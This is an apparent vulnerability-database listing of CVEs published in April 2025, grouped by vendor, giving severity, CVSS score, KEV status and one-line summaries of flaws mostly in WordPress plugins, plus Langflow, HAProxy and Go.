| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31388 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in doa The World the-world allows Stored XSS.This issue affects The World: from n/a through <= 0.4. |
Dolby_uk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31021 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dolby_uk Mobile Smart mobile-smart allows Reflected XSS.This issue affects Mobile Smart: from n/a through <= v1.3.16. |
Eazyplugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32542 | High | 8.8 | — | 2025-04-11 | Missing Authorization vulnerability in EazyPlugins Eazy Plugin Manager plugins-on-steroids allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eazy Plugin Manager: from n/a through <= 4.3.0. |
Edamam · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32555 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Edamam SEO, Nutrition and Print for Recipes by Edamam seo-nutrition-and-print-for-recipes-by-edamam allows Stored XSS.This issue affects SEO, Nutrition and Print for Recipes by Edamam: fro… |
Element-hq · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32026 | Low | 3.8 | — | 2025-04-08 | Element Web is a Matrix web client built using the Matrix React SDK. |
Elementor · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32640 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor Ally pojo-accessibility allows Stored XSS.This issue affects Ally: from n/a through <= 3.1.0. |
Eliot Akira · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32492 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eliot Akira Admin Menu Post List admin-menu-post-list allows Stored XSS.This issue affects Admin Menu Post List: from n/a through <= 2.0… |
Elpix · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3432 | Medium | 6.4 | — | 2025-04-08 | The AAWP Obfuscator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-aawp-web' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. |
Embeds For Youtube Plugin Support · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31008 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Embeds For YouTube Plugin Support YouTube Embed youtube-embed allows Stored XSS.This issue affects YouTube Embed: from n/a through <= 5.3… |
Empik · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32568 | Critical | 9.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in empik EmpikPlace for Woocommerce empik-for-woocommerce allows Object Injection.This issue affects EmpikPlace for Woocommerce: from n/a through <= 1.4.3. |
Epeken · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32673 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in epeken Epeken All Kurir epeken-all-kurir allows Stored XSS.This issue affects Epeken All Kurir: from n/a through <= 2.0.6. |
Eset, Spol. S R.o. · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-11859 | — | — | — | 2025-04-07 | DLL Search Order Hijacking vulnerability potentially allowed an attacker with administrator privileges to load a malicious dynamic-link library and execute its code. |
Essential Marketer · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31038 | High | 8.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Essential Marketer Essential Breadcrumbs essential-breadcrumbs allows Privilege Escalation.This issue affects Essential Breadcrumbs: from n/a through <= 1.1.1. |
Exthemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31040 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Exthemes WP Food ordering and Restaurant Menu wp-food allows PHP Local File Inclusion.This issue affects WP Food order… |
Eyale-vc · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32199 | Medium | 6.5 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eyale-vc Contact Form Builder by vcita contact-form-with-a-meeting-scheduler-by-vcita allows DOM-Based XSS.This issue affects Contact For… |
Fcj Venture Builder · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3405 | Medium | 4.3 | — | 2025-04-08 | A vulnerability was found in FCJ Venture Builder appclientefiel 3.0.27. |
Feedify · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13874 | High | 7.1 | — | 2025-04-10 | The Feedify WordPress plugin before 2.4.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin |
Felixker · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-8243 | Medium | 6.3 | — | 2025-04-09 | The WordPress/Plugin Upgrade Time Out Plugin WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads… |
Flothemesplugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32213 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in flothemesplugins Flo Forms flo-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flo Forms: from n/a through <= 1.0.43. |
Flowiseai · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29189 | High | 7.6 | — | 2025-04-09 | Flowise <= 2.2.3 is vulnerable to SQL Injection. |
Foliovision · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32610 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in FolioVision Foliopress WYSIWYG foliopress-wysiwyg allows Cross Site Request Forgery.This issue affects Foliopress WYSIWYG: from n/a through <= 2.6.18. |
Fooplugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32139 | Medium | 5.9 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FooPlugins FooBox Image Lightbox foobox-image-lightbox.This issue affects FooBox Image Lightbox : from n/a through <= 2.7.33. |
Foysal Imran · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32519 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Foysal Imran IDonate idonate allows PHP Local File Inclusion.This issue affects IDonate: from n/a through <= 2.1.18. |
Fraudlabspro · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32659 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in fraudlabspro FraudLabs Pro for WooCommerce fraudlabs-pro-for-woocommerce allows Stored XSS.This issue affects FraudLabs Pro for WooCommerce: from n/a through <= 2.22.8. |
Fromdoppler · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32667 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in fromdoppler Doppler Forms doppler-form allows Stored XSS.This issue affects Doppler Forms: from n/a through <= 2.5.1. |
Fusiondirectory · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32807 | Medium | 5.3 | — | 2025-04-11 | A path traversal vulnerability in FusionDirectory before 1.5 allows remote attackers to read arbitrary files on the host that end with .png (and .svg or .xpm for some configurations) via the icon parameter of a GET request to geticon.php. |
G5theme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32672 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in g5theme Ultimate Bootstrap Elements for Elementor ultimate-bootstrap-elements-for-elementor allows PHP Local File Incl… |
Gdragon · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3436 | Medium | 6.5 | — | 2025-04-08 | The coreActivity: Activity Logging for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'order' and 'orderby' parameters in all versions up to, and including, 2.7 due to insufficient escaping on the user supplied param… |
George Sexton · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32597 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in George Sexton WordPress Events Calendar Plugin – connectDaily connect-daily-web-calendar allows Cross-Site Scripting (XSS).This issue affects WordPress Events Calendar Plugin – connectDail… |
Getcursor · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32018 | High | 8.0 | — | 2025-04-08 | Cursor is a code editor built for programming with AI. |
Go Standard Library · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22871 | Critical | 9.1 | — | 2025-04-08 | The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. |
Grade Us, Inc. · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32680 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Grade Us, Inc. |
Graphicsmagick · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32460 | Medium | 4.0 | — | 2025-04-09 | GraphicsMagick before 8e56520 has a heap-based buffer over-read in ReadJXLImage in coders/jxl.c, related to an ImportViewPixelArea call. |
Graylog · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30373 | Medium | 6.5 | — | 2025-04-07 | Graylog is a free and open log management platform. |
Greenmoney · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2882 | Medium | 5.3 | — | 2025-04-08 | The GreenPay(tm) by Green.Money plugin for WordPress is vulnerable to Sensitive Information Exposure in versions between 3.0.0 and 3.0.9 through the publicly accessible phpinfo.php script. |
Gtlwpdev · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32547 | High | 8.2 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in gtlwpdev All push notification for WP all-push-notification allows Blind SQL Injection.This issue affects All push notification for WP: from n/a through <= 1.5.3. |
Guichaguri · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32020 | — | — | — | 2025-04-08 | The crud-query-parser library parses query parameters from HTTP requests and converts them to database queries. |
Hakeemnala · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32577 | Critical | 9.8 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in hakeemnala Build App Online build-app-online allows PHP Local File Inclusion.This issue affects Build App Online: from… |
Haproxy · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32464 | Medium | 6.8 | — | 2025-04-09 | HAProxy 2.2 through 3.1.6, in certain uncommon configurations, has a sample_conv_regsub heap-based buffer overflow because of mishandling of the replacement of multiple short patterns with a longer one. |
Hasthemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2719 | Medium | 6.5 | — | 2025-04-10 | The Swatchly – WooCommerce Variation Swatches for Products (product attributes: Image swatch, Color swatches, Label swatches) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the… |
Haxtheweb · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32028 | Critical | 9.9 | — | 2025-04-08 | HAX CMS PHP allows you to manage your microsite universe with PHP backend. |
Hedgedoc · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32391 | Medium | 6.4 | — | 2025-04-10 | HedgeDoc is an open source, real-time, collaborative, markdown notes application. |
Hewlett Packard Enterprise · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27081 | Medium | 6.8 | — | 2025-04-10 | A potential security vulnerability in HPE NonStop OSM Service Connection Suite could potentially be exploited to allow a local Denial of Service. |
Hiren Patel · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32645 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Hiren Patel Custom Posts Order custom-posts-order allows Stored XSS.This issue affects Custom Posts Order: from n/a through <= 4.4. |
Hivedigital · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32543 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hivedigital Canonical Attachments canonical-attachments allows Reflected XSS.This issue affects Canonical Attachments: from n/a through <… |
Hk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32603 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HK WP Online Users Stats wp-online-users-stats allows Blind SQL Injection.This issue affects WP Online Users Stats: from n/a through <= 1… |
Horvey · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29391 | High | 7.2 | — | 2025-04-09 | horvey Library-Manager v1.0 is vulnerable to SQL Injection in Admin/Controller/BookController.class.php. |
Hossainawlad · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32518 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in hossainawlad ALD Login Page ald-login-page allows Stored XSS.This issue affects ALD Login Page: from n/a through <= 1.1. |
Hossein · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31014 | High | 7.5 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Hossein Material Dashboard material-dashboard allows PHP Local File Inclusion.This issue affects Material Dashboard: f… |
Hugh Mungus · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27350 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Vice Versa vice-versa allows Reflected XSS.This issue affects Vice Versa: from n/a through <= 2.2.3. |
Huseyin Berberoglu · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31028 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Huseyin Berberoglu WP Hide Categories wp-hide-categories allows Reflected XSS.This issue affects WP Hide Categories: from n/a through <=… |
Icyleaf · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31400 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in icyleaf WS Audio Player ws-audio-player allows Stored XSS.This issue affects WS Audio Player: from n/a through <= 1.1.8. |
Infosoftplugin · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32541 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in infosoftplugin WooCommerce Sales MIS Report woocommerce-mis-report allows Reflected XSS.This issue affects WooCommerce Sales MIS Report… |
Instawp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2636 | High | 8.1 | — | 2025-04-11 | The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. |
Intelcaprep · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31385 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in intelcaprep Site Table of Contents site-table-of-contents allows Stored XSS.This issue affects Site Table of Contents: from n/a through <= 0.3. |
Ip2location · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32644 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in IP2Location IP2Location World Clock ip2location-world-clock allows Stored XSS.This issue affects IP2Location World Clock: from n/a through <= 1.1.9. |
Jaap Jansma · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32551 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jaap Jansma Connector to CiviCRM with CiviMcRestFace connector-civicrm-mcrestface allows Reflected XSS.This issue affects Connector to Ci… |
Jalios · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0942 | High | 8.6 | — | 2025-04-07 | The DB chooser functionality in Jalios JPlatform 10 SP6 before 10.0.6 improperly neutralizes special elements used in an SQL command allows for unauthenticated users to trigger SQL Injection. |
Jan Boddez · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31009 | Medium | 5.4 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in Jan Boddez IndieBlocks indieblocks allows Server Side Request Forgery.This issue affects IndieBlocks: from n/a through <= 0.13.1. |
Jerryhanjj · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29390 | High | 8.8 | — | 2025-04-09 | jerryhanjj ERP 1.0 is vulnerable to SQL Injection in the set_password function in application/controllers/home.php. |
Jgehrcke · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13896 | Medium | 6.5 | — | 2025-04-10 | The WP-GeSHi-Highlight — rock-solid syntax highlighting for 259 languages WordPress plugin through 1.4.3 processes user-supplied input as a regular expression via the wp_geshi_filter_replace_code() function, which could lead to Regular Exp… |
Joey-zhou · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3382 | Medium | 6.3 | — | 2025-04-07 | A vulnerability has been found in joey-zhou xiaozhi-esp32-server-java up to a14fe8115842ee42ab5c7a51706b8a85db5200b7 and classified as critical. |
John James Jacoby · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31524 | High | 8.8 | — | 2025-04-10 | Incorrect Privilege Assignment vulnerability in John James Jacoby WP User Profiles wp-users-profiles allows Privilege Escalation.This issue affects WP User Profiles: from n/a through <= 2.6.2. |
John Weissberg · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32671 | High | 7.5 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in John Weissberg Print Science Designer print-science-designer allows Path Traversal.This issue affects Print Science Designer: from n/a through… |
Joomsky · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32627 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in JoomSky JS Job Manager js-jobs allows PHP Local File Inclusion.This issue affects JS Job Manager: from n/a through <=… |
Jordi Salord · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32477 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Jordi Salord WP-Easy Menu wp-easy-menu allows Stored XSS.This issue affects WP-Easy Menu: from n/a through <= 0.41. |
Jose Conti · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32503 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jose Conti Link Shield link-shield allows Stored XSS.This issue affects Link Shield: from n/a through <= 0.5.4. |
Josh Kohlbach · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32539 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Josh Kohlbach Store Exporter woocommerce-exporter allows Reflected XSS.This issue affects Store Exporter: from n/a through <= 2.7.4. |
Kailey (Trepmal) · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31394 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kailey (trepmal) More Mime Type Filters more-mime-type-filters allows Stored XSS.This issue affects More Mime Type Filters: from n/a thro… |
Kaizencoders · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32632 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KaizenCoders Automatic Ban IP automatic-ban-ip allows Reflected XSS.This issue affects Automatic Ban IP: from n/a through <= 1.0.7. |
Kendysond · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-10894 | Medium | 6.4 | — | 2025-04-10 | The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'datepicker', 'textarea', and 'text' in all versions up to, and including, 4.0.2 due to insufficient input sa… |
Ketanajani · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32558 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ketanajani Duplicate Title Checker duplicate-title-checker allows Blind SQL Injection.This issue affects Duplicate Title Checker: from n/… |
Kevon Adonis · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32591 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Kevon Adonis WP Abstracts wp-abstracts-manuscripts-manager allows Cross Site Request Forgery.This issue affects WP Abstracts: from n/a through <= 2.7.5. |
Keycaptcha · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32619 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in KeyCAPTCHA KeyCAPTCHA keycaptcha allows Stored XSS.This issue affects KeyCAPTCHA: from n/a through <= 2.5.1. |
Koajs · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32379 | Medium | 5.0 | — | 2025-04-09 | Koa is expressive middleware for Node.js using ES2017 async functions. |
Labcat · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32206 | Critical | 9.1 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in LABCAT Processing Projects processing-projects allows Upload a Web Shell to a Web Server.This issue affects Processing Projects: from n/a through <= 1.0.2. |
Langflow · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3248 | Critical | 9.8 | KEV | 2025-04-07 | Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. |
Lemmentwickler · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32502 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in lemmentwickler ePaper Lister for Yumpu magazine-lister-for-yumpu allows Stored XSS.This issue affects ePaper Lister for Yumpu: from n/a through <= 1.4.0. |
Lenovo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-11679 | Medium | 4.4 | — | 2025-04-11 | An input validation weakness was reported in the TpmSetup module for some legacy System x server products that could allow a local attacker with elevated privileges to read the contents of memory. |
Lenve · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3398 | Medium | 6.3 | — | 2025-04-08 | A vulnerability classified as critical was found in lenve VBlog up to 1.0.0. |
Libbpf_project · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29481 | Medium | 6.2 | — | 2025-04-07 | Buffer Overflow vulnerability in libbpf 1.5.0 allows a local attacker to execute arbitrary code via the bpf_object__init_prog` function of libbpf. |
Lisandro Martinez · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31565 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Lisandro Martinez WPSmartContracts wp-smart-contracts allows Blind SQL Injection.This issue affects WPSmartContracts: from n/a through <=… |
Lucee · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-55354 | High | 8.8 | — | 2025-04-08 | Lucee before 5.4.7.3 LTS and 6 before 6.1.1.118, when an attacker can place files on the server, is vulnerable to a protection mechanism failure that can let an attacker run code that would be expected to be blocked and access resources th… |
Maennchen1.de · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32164 | Medium | 6.5 | — | 2025-04-08 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in maennchen1.de m1.DownloadList m1downloadlist allows Retrieve Embedded Sensitive Data.This issue affects m1.DownloadList: from n/a through <= 0.24. |
Mapgeo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32525 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MapGeo Interactive Geo Maps interactive-geo-maps allows Reflected XSS.This issue affects Interactive Geo Maps: from n/a through <= 1.6.24. |
Mario Aguiar · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32478 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Mario Aguiar WP SexyLightBox wp-sexylightbox allows Stored XSS.This issue affects WP SexyLightBox: from n/a through <= 0.5.3. |
Mathieu Chartier · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32484 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Mathieu Chartier WP-Planification wp-planification allows Stored XSS.This issue affects WP-Planification: from n/a through <= 2.3.1. |
Mattermost · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-24866 | Low | 2.7 | — | 2025-04-10 | Mattermost versions 9.11.x <= 9.11.8 fail to enforce proper access controls on the /api/v4/audits endpoint, allowing users with delegated granular administration roles who lack access to Compliance Monitoring to retrieve User Activity Log… |
Melapress · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2876 | Medium | 5.3 | — | 2025-04-08 | The MelaPress Login Security and MelaPress Login Security Premium plugins for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'monitor_admin_actions' function in version 2.1.0. |
Melhorenvio · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13820 | Medium | 5.3 | — | 2025-04-08 | The Melhor Envio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.15.11 via the 'run' function, which uses a hardcoded hash. |
Mergado · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32669 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in MERGADO Mergado Pack mergado-marketing-pack allows Stored XSS.This issue affects Mergado Pack: from n/a through <= 4.2.1. |
Mestres Do Wp · 1 CVE
